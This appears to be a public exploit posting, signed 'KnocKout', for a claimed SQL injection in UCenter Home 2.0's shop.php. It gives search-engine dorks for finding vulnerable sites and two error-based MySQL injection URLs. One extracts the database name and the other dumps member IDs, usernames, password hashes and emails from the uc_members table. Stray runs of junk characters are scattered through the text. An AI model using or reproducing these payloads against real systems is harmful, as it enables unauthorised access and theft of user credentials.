__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& ]3 x* g. h8 lDork : Powered by UCenter inurl:shop.php?ac=view 6 a* X: }" M' B
, c) d- P$ b7 ?: g& V) o/ _Dork 2 : inurl:shop.php?ac=view&shopid= 1 S9 J; _1 T G8 Y* G! I3 I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Parameters : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL Error Based)
Needed materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
# Y! w; f3 R, P0 i! e4 d' _2 \; Qfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 O, _# |9 N4 k1 I
..

DB : Okey.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, and edit your SQL injection exploit.
8 C6 I! `( l0 O. n) Q/ u V" B# R5 CExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ?& ^# s! S) f4 q5 C" _
|